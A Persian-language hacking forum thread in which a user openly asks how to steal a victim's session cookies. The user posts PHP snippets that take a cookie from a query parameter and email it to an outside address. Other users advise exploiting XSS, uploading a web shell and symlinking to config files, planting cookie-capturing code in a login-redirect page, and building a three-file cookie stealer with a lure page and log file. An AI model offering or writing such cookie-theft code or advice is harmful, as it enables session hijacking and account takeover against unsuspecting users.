OOOHHHAAACCCKKKOOO ارسال شده در ژانویه 23 2019 گزارش اشتراک گذاری ارسال شده در ژانویه 23 2019 سلام ببخشید چطور یک کد php بنویسم که وقتی فایل php رو باز می کنم، کوکی من به یک ایمیل ارسال بشه؟ واکنش ها : Who و johnjones 1 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
R3dC0d3r ارسال شده در ژانویه 23 2019 گزارش اشتراک گذاری ارسال شده در ژانویه 23 2019 درود دقیق هدفتون از این کار چیه ؟ باید در نظر داشته باشی که هر سایت به کوکی های هاست و دامنه خودش در مرورگر دسترسی داره ! یعنی صرفا جنبه نفوذ به کلاینت رو نداره ! مگر کد های مخربی بنویسی که سمت کلاینت اجرا بشن . با این تفاسیر : کوکی ها در آرایه سوپر گلوبال کوکی در پی اچ پی ذخیر میشن و می تونی با syntax زیر بهشون دسترسی پیدا کنی This is the hidden content, please ورود یا ثبت نام بعد از اون با استفاده از تابع mail() که در کتابخانه استاندارد پی اچ پی موجود هست می تونی ایمیل ارسال کنی ، لازم به ذکره mail از smtp پیش فرض سرور استفاده میکنه ، برای آپشن های حرفه ای تر میتونی از کتابخانه هایی مثل پی اچ پی میلر و غیره استفاده کنی واکنش ها : johnjones، N1F3r، DeMoN و 5 نفر دیگر 8 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در ژانویه 24 2019 نویسنده گزارش اشتراک گذاری ارسال شده در ژانویه 24 2019 نه منظورم اینه که مثلا کوکی یک سایت مشخص مثلا guardiran.org رو به ایمیل مشخصی ارسال کنه. واکنش ها : johnjones و Who 2 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
R3dC0d3r ارسال شده در ژانویه 24 2019 گزارش اشتراک گذاری ارسال شده در ژانویه 24 2019 کوکی سایت مشخص ؟! گفتم که باید برای این کار کدی رو بنویسی که سمت کلاینت اجرا بشه ، به زبان جاوا اسکریپت و غیره تا اول از همه اطلاعات مرورگر رو فچ کنه و به دست بیاره پی اچ پی زبان سمت سرور هست واکنش ها : johnjones، MR.wIzArD، backpack و 1 نفر دیگر 4 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در ژانویه 25 2019 نویسنده گزارش اشتراک گذاری ارسال شده در ژانویه 25 2019 در در 1397/11/04, 19:57:52، R3dC0d3r گفته است : کوکی سایت مشخص ؟! گفتم که باید برای این کار کدی رو بنویسی که سمت کلاینت اجرا بشه ، به زبان جاوا اسکریپت و غیره تا اول از همه اطلاعات مرورگر رو فچ کنه و به دست بیاره پی اچ پی زبان سمت سرور هست یعنی نمیشه ادمین یک سایت که میخوایم کوکیش رو بدزدیم از سایت خودش به صفحه ی php ای که توش این کد ها هست هدایت بشه و کوکیش دزدیده بشه؟ php?> ;['cookie = $_GET['cookie$ ;['uri = $_SERVER['HTTP_REFERER$ ,'!mail( 'Hello@gmail.com', 'We got another one ;( ".Go to $uri and present cookie $cookie" ;(header( 'Location: '.$uri <? واکنش ها : Who و johnjones 2 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
R3dC0d3r ارسال شده در ژانویه 25 2019 گزارش اشتراک گذاری ارسال شده در ژانویه 25 2019 دوست عزیز اگه به سرور سایت دسترسی داری دیگه هدفت ازینکه کوکی رو بدزدی چیه ؟؟ کافیه یه شل آپلود کنی تا سیملینک بزنه به Config و دسترسی به دیتابیس و تمام داده های اون رو بگیری در 4 ساعت قبل، OOOHHHAAACCCKKKOOO گفته است : php?> ;['cookie = $_GET['cookie$ ;['uri = $_SERVER['HTTP_REFERER$ ,'!mail( 'Hello@gmail.com', 'We got another one ".Go to $uri and present cookie $cookie" ;(header( 'Location: '.$uri <? سینتکس کد بالا درست نیست ، با کئوری استرینگ که کوکی رو نمیگرن به شما گفتم در چه ارایه ای ذخیره میشه از زمانی که یادم میاد فعالیتت رو شروع کردی چند ماهی میگذره ؛ اون موقع هم گفتم که مباحث رو از پایه یاد بگیر نه اینکه صرفا یه کدی رو از یه جایی برای انجام یه کاری به دست بیاری بنظرم خیلی بده که چند ماه بگذره و ادم هیچ پیشرفتی نداشته باشه الانم دیر نشده ، سراغ یاد گیری از پایه برو واکنش ها : DeMoN، johnjones، backpack و 2 نفر دیگر 4 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
Who ارسال شده در ژانویه 26 2019 گزارش اشتراک گذاری ارسال شده در ژانویه 26 2019 سلام من جدیداً به این سایت پیوسته ام و چون سوالم هماهنگ با این تاپیک بود همین مکان مطرح می نمایم: چگونه می توان کد php یا javascript ای نوشت که باز کردن آن کوکی ما در سایتی همچون www.google.com چاپ شود؟ (در همان صفحه ی php یا javascript چاپ گردد. واکنش ها : johnjones 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در ژانویه 27 2019 نویسنده گزارش اشتراک گذاری ارسال شده در ژانویه 27 2019 . واکنش ها : johnjones 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در فِوریه 1 2019 نویسنده گزارش اشتراک گذاری ارسال شده در فِوریه 1 2019 در در 1397/11/06, 19:00:46، virtual_hate گفته است : سلام وقت بخیر با استفاده از اکستنشن curl در php میتونید با ارسال درخواست به یک سایت کوکی رو دریافت کنید This is the hidden content, please ورود یا ثبت نام برای راحتی میتونید یک فرم با یک تکست باکس بگذارید و وقت سابمیت کردنش توسط متد post یا get مقدار رو به curl_init بدید یعنی اگه این کد رو تو یک فایل php بریزیم، وقتی بازش کنیم، اون فایل php کوکی ما نسبت به سایت گوگل رو نشون میده؟ و این که آنتی ویروس گیر میده بهش یا نه؟ واکنش ها : johnjones 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در فِوریه 2 2019 نویسنده گزارش اشتراک گذاری ارسال شده در فِوریه 2 2019 در 20 ساعت قبل، virtual_hate گفته است : سلام دوست عزیز بله این فایل رو با پسوند php ذخیره کنید و میتونید با نصب ومپ یا زمپ رو سیستم رانش کنید این یک اکستنشن php هست و نباید انتی ویروس بهش گیر بده گرچه بنده انتی ویروس ندارم این مورد رو تست نکردم اگر گیر داد انتی ویروس رو غیرفعالش کنید اگر مایل هستید کامل توضیح بدید که میخواید با کوکی ها چه کاری انجام بدید تا بنده راهنمایتون کنم شاید این سبک دریافت کوکی بدرد شما نخوره به هر حال بنده از هدف شما بی اطلاع هستم و این کد یک سری درخواست ارسال میکنه به سرور مربوط به سایت و یک کوکی رو دریافت میکنه و در خروجی چاپش میکنه که همین کار رو میتونید با استفاده از مرورگر هم بدست بیاری. This is the hidden content, please ورود یا ثبت نام می خوام یه کد ایمیل به این کد اضافه کنم و بعد به یک شخصی بفرستم تا وقتی فایل حاوی کد رو باز کرد، کوکیش نسبت به سایت گوگل به اون ایمیلی که مشخص کردم، ارسال بشه. واکنش ها : johnjones 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در فِوریه 4 2019 نویسنده گزارش اشتراک گذاری ارسال شده در فِوریه 4 2019 در در 1397/11/13, 14:51:30، virtual_hate گفته است : سلام دوست عزیز برای دسترسی گرفتن از طریق کوکی تارگت نمیتونید به این شکل عمل کنید اینکار شما شاید یک کوکی رو برای شما ارسال بکنه ولی عملا اون کوکی بی استفاده خواهد بود چونکه شما نیاز به کوکی دارید که بر روی مرورگر قربانی ست شده کوکی که بعد از احراز هویت نسبت به اون سایت دریافت کرده و شما به اون کوکی برای گرفتن دسترسی نیاز دارید. پس چطور اون کوکی رو با کد PHP یا Java script بگیرم؟ واکنش ها : johnjones 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
nnje ارسال شده در فِوریه 4 2019 گزارش اشتراک گذاری ارسال شده در فِوریه 4 2019 در 4 ساعت قبل، OOOHHHAAACCCKKKOOO گفته است : پس چطور اون کوکی رو با کد PHP یا Java script بگیرم؟ سلام بدون داشتن اسیب پذیری در سایت مورد نظر (از جمله اسیب پذیری xss ) شما عملا نمیتونید کوکی های تارگت رو به سرقت ببرید چونکه کدها برای اینکار باید به نحوی به سایت تزریق بشه گرچه شاید باشند کسانی که اسکریپت یا روشهای کشف کرده باشند که بنده از اونها بی اطلاع هستم. ولی بصورت کلی سایتهای که امنیت قابل قبولی دارند در صورت دریافت اسکریپت برای دریافت کوکی اون اسکریپت و کدهای درون اون رو اسکیپ میکنن. پیشنهاد بنده به شما اینکه سایت مورد نظر رو بدقت بررسی کنید و تمام تستهای امنیتی که به اون مسلط هستید رو روی سایت انجام بدید شاید بتونید باگ و راهی برای نفوذ پیدا کنید اگر چه باز راهی برای نفوذ پیدا نکردید میتونید از سایت های روی سرور کمک بگیرید و اونا رو هم بررسی کنید. واکنش ها : Reza.Black، C0d3!Nj3ct!0n و johnjones 3 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در فِوریه 8 2019 نویسنده گزارش اشتراک گذاری ارسال شده در فِوریه 8 2019 در در 1397/11/15, 18:16:16، virtual_hate گفته است : سلام بدون داشتن اسیب پذیری در سایت مورد نظر (از جمله اسیب پذیری xss ) شما عملا نمیتونید کوکی های تارگت رو به سرقت ببرید چونکه کدها برای اینکار باید به نحوی به سایت تزریق بشه گرچه شاید باشند کسانی که اسکریپت یا روشهای کشف کرده باشند که بنده از اونها بی اطلاع هستم. ولی بصورت کلی سایتهای که امنیت قابل قبولی دارند در صورت دریافت اسکریپت برای دریافت کوکی اون اسکریپت و کدهای درون اون رو اسکیپ میکنن. پیشنهاد بنده به شما اینکه سایت مورد نظر رو بدقت بررسی کنید و تمام تستهای امنیتی که به اون مسلط هستید رو روی سایت انجام بدید شاید بتونید باگ و راهی برای نفوذ پیدا کنید اگر چه باز راهی برای نفوذ پیدا نکردید میتونید از سایت های روی سرور کمک بگیرید و اونا رو هم بررسی کنید. خب اگه من به صورت کامل به سایت دسترسی داشته باشم، میتونم کوکی تارگت رو به سرقت ببرم؟ واکنش ها : Reza.Black و johnjones 2 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
nnje ارسال شده در فِوریه 8 2019 گزارش اشتراک گذاری ارسال شده در فِوریه 8 2019 در 29 دقیقه قبل، OOOHHHAAACCCKKKOOO گفته است : خب اگه من به صورت کامل به سایت دسترسی داشته باشم، میتونم کوکی تارگت رو به سرقت ببرم؟ سلام متوجه دلیل اینکار شما نمیشم وقتی دسترسی کامل دارید و میتونید با یوزرنیم پسورد قربانی لاگین بشید دیگه گرفتن کوکی اون شخص چه سودی برای شما داره ؟ واکنش ها : Reza.Black، backpack و johnjones 2 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در فِوریه 8 2019 نویسنده گزارش اشتراک گذاری ارسال شده در فِوریه 8 2019 در 12 دقیقه قبل، virtual_hate گفته است : سلام متوجه دلیل اینکار شما نمیشم وقتی دسترسی کامل دارید و میتونید با یوزرنیم پسورد قربانی لاگین بشید دیگه گرفتن کوکی اون شخص چه سودی برای شما داره ؟ خب راستش هدف من دسترسی به سایت نیست هدف من سرقت کوکی اون شخصه. (کوکیش در اون سایتی که من بهش دسترسی کامل دارم.) واکنش ها : mownten، johnjones و Reza.Black 1 1 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
nnje ارسال شده در فِوریه 8 2019 گزارش اشتراک گذاری ارسال شده در فِوریه 8 2019 در 46 دقیقه قبل، OOOHHHAAACCCKKKOOO گفته است : خب راستش هدف من دسترسی به سایت نیست هدف من سرقت کوکی اون شخصه. (کوکیش در اون سایتی که من بهش دسترسی کامل دارم.) این واقعا عجیب ترین هدفی بوده که تو بحث هکینگ دیدم ولی شما میتونید وارد قسمت کدنویسی صفحه لاگین بشید صفحه ای رو که بعد از احراز هویت شدن ریدایرکت میشه رو پیدا کنید و وارد کدهای سمت سرور اون صفحه بشید و یک تیکه کد ساده بهش اضافه کنید که کوکی تمام کاربرا یا با یک شرط که اون یوزرنیم رومشخص میکنه رو بگیرید و کوکیش رو بردارید و تا زمانی که دکمه خروج رو نمیزنه و سشن منقضی نشه میتونید ازش استفاده کنید. واکنش ها : Reza.Black، johnjones و backpack 3 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در فِوریه 8 2019 نویسنده گزارش اشتراک گذاری ارسال شده در فِوریه 8 2019 در 1 ساعت قبل، virtual_hate گفته است : این واقعا عجیب ترین هدفی بوده که تو بحث هکینگ دیدم ولی شما میتونید وارد قسمت کدنویسی صفحه لاگین بشید صفحه ای رو که بعد از احراز هویت شدن ریدایرکت میشه رو پیدا کنید و وارد کدهای سمت سرور اون صفحه بشید و یک تیکه کد ساده بهش اضافه کنید که کوکی تمام کاربرا یا با یک شرط که اون یوزرنیم رومشخص میکنه رو بگیرید و کوکیش رو بردارید و تا زمانی که دکمه خروج رو نمیزنه و سشن منقضی نشه میتونید ازش استفاده کنید. شاید منظور من رو اشتباه متوجه شدین. لاگینی در کار نیست. فرض کنید که مثلا من به لینک This is the hidden content, please ورود یا ثبت نام دسترسی کامل دارم.(که این لینک نیاز به لاگین نداره.) حالا میخوام یک کاری کنم که هر کی به این لینک وارد شد، من کوکیش رو ببینم. منظورم من هم از کوکی این کوکی هست 👇 This is the hidden content, please ورود یا ثبت نام واکنش ها : johnjones و Reza.Black 2 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
0r0b4s ارسال شده در فِوریه 10 2019 گزارش اشتراک گذاری ارسال شده در فِوریه 10 2019 با سلام خدمت شما دوست عزیز وقتی شما یوزر پس رو داری دیگه نیازی بع اتیلر کوکی نیس اما با این حال بنده با دانش اندکی که دارم یکم توضیح بدم در رابطه با کوکی استیلر اینو شما میتونی رو هر کاربری که پیج شمارو وا کنه اجرا کنی نکته :این اموزش فقط جنبه علمی اموزشی داره و نحوه استفاده از اون بر میگرده شخصیت فرد وبنده مسولیتی در قبال دزدیدن کوکی دیگران ندارم شما فقط نیازمند 3تا فایل هستید اولی پیج htmlکه به کاربر نشون میده دومی کد phpکه براتون کار دزدیدن کوکی رو برعهده داره و سومی که یک فایله که کار نگه داشتن کوکی های دزدی رو بر عهده داره قدم اول: ساخت صفحه دلخواهتون This is the hidden content, please ورود یا ثبت نام قدم دوم: تزریق کدتون که جایی اپلود کردین تا کوکی بهش ارسال بشه This is the hidden content, please ورود یا ثبت نام قدم سوم : ساخت کد پی اچ پی 0utc4s7-stealer.php This is the hidden content, please ورود یا ثبت نام وساختن فایلی به اسم.0utc4s7.txt وکار تمام است. *********************************************************** یا در حالت خیلی ساده و ساده تر شما فقط اگر خواستین میتونید به دوتای اینها نیاز داشته باشید یکی کد پی اچ پی و دیگری فایل نوت پد در سایه حق دوستان چون جاش اینجا نیس نمیتونم بیشتر از این توضیح بدم بنابه دلایل و قوانین انجمن که نمیتونیم قوانین کارگزاری رو زیر پا بزاریم با سپاس واکنش ها : RT3N، Reza.Black و johnjones 1 2 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
OOOHHHAAACCCKKKOOO ارسال شده در فِوریه 11 2019 نویسنده گزارش اشتراک گذاری ارسال شده در فِوریه 11 2019 در 19 ساعت قبل، 0r0b4s گفته است : با سلام خدمت شما دوست عزیز وقتی شما یوزر پس رو داری دیگه نیازی بع اتیلر کوکی نیس اما با این حال بنده با دانش اندکی که دارم یکم توضیح بدم در رابطه با کوکی استیلر اینو شما میتونی رو هر کاربری که پیج شمارو وا کنه اجرا کنی نکته :این اموزش فقط جنبه علمی اموزشی داره و نحوه استفاده از اون بر میگرده شخصیت فرد وبنده مسولیتی در قبال دزدیدن کوکی دیگران ندارم شما فقط نیازمند 3تا فایل هستید اولی پیج htmlکه به کاربر نشون میده دومی کد phpکه براتون کار دزدیدن کوکی رو برعهده داره و سومی که یک فایله که کار نگه داشتن کوکی های دزدی رو بر عهده داره قدم اول: ساخت صفحه دلخواهتون This is the hidden content, please ورود یا ثبت نام قدم دوم: تزریق کدتون که جایی اپلود کردین تا کوکی بهش ارسال بشه This is the hidden content, please ورود یا ثبت نام قدم سوم : ساخت کد پی اچ پی 0utc4s7-stealer.php This is the hidden content, please ورود یا ثبت نام وساختن فایلی به اسم.0utc4s7.txt وکار تمام است. *********************************************************** یا در حالت خیلی ساده و ساده تر شما فقط اگر خواستین میتونید به دوتای اینها نیاز داشته باشید یکی کد پی اچ پی و دیگری فایل نوت پد در سایه حق دوستان چون جاش اینجا نیس نمیتونم بیشتر از این توضیح بدم بنابه دلایل و قوانین انجمن که نمیتونیم قوانین کارگزاری رو زیر پا بزاریم با سپاس ممنونم. فقط اگه صفحه ای که کاربر توش هست بجای html و همون کد قدم دوم فقط با php نوشته شده باشه و کدش هم این باشه، کوکیش در اون صفحه به ایمیل 123@gmail.com ارسال میشه؟ <?php $cookie = $_GET['cookie']; mail( '123@gmail.com', 'Hello!', "$cookie." ); واکنش ها : Reza.Black و johnjones 2 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
0r0b4s ارسال شده در فِوریه 11 2019 گزارش اشتراک گذاری ارسال شده در فِوریه 11 2019 با سلام دوست عزیز بنده این تاپیک رو از اول خوندم تا اخر برای جواب به سوال شما دیگه نطری ندارم و از اونجاییم که شما مسئول یه سرور در شرکتی هستید( فک کنم) کلا دیگه نظر خاصی ندارم در سایه حق تعالی نکته : دوستان من زیاد کلمه درسایه حق رو بکار میبرم اما وقتی یک کلمه دیگه بهش اضافه میکنم بدان معنی است که دیگه هیچ نظری ندارم واکنش ها : RT3N، Reza.Black، MR.wIzArD و 1 نفر دیگر 4 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .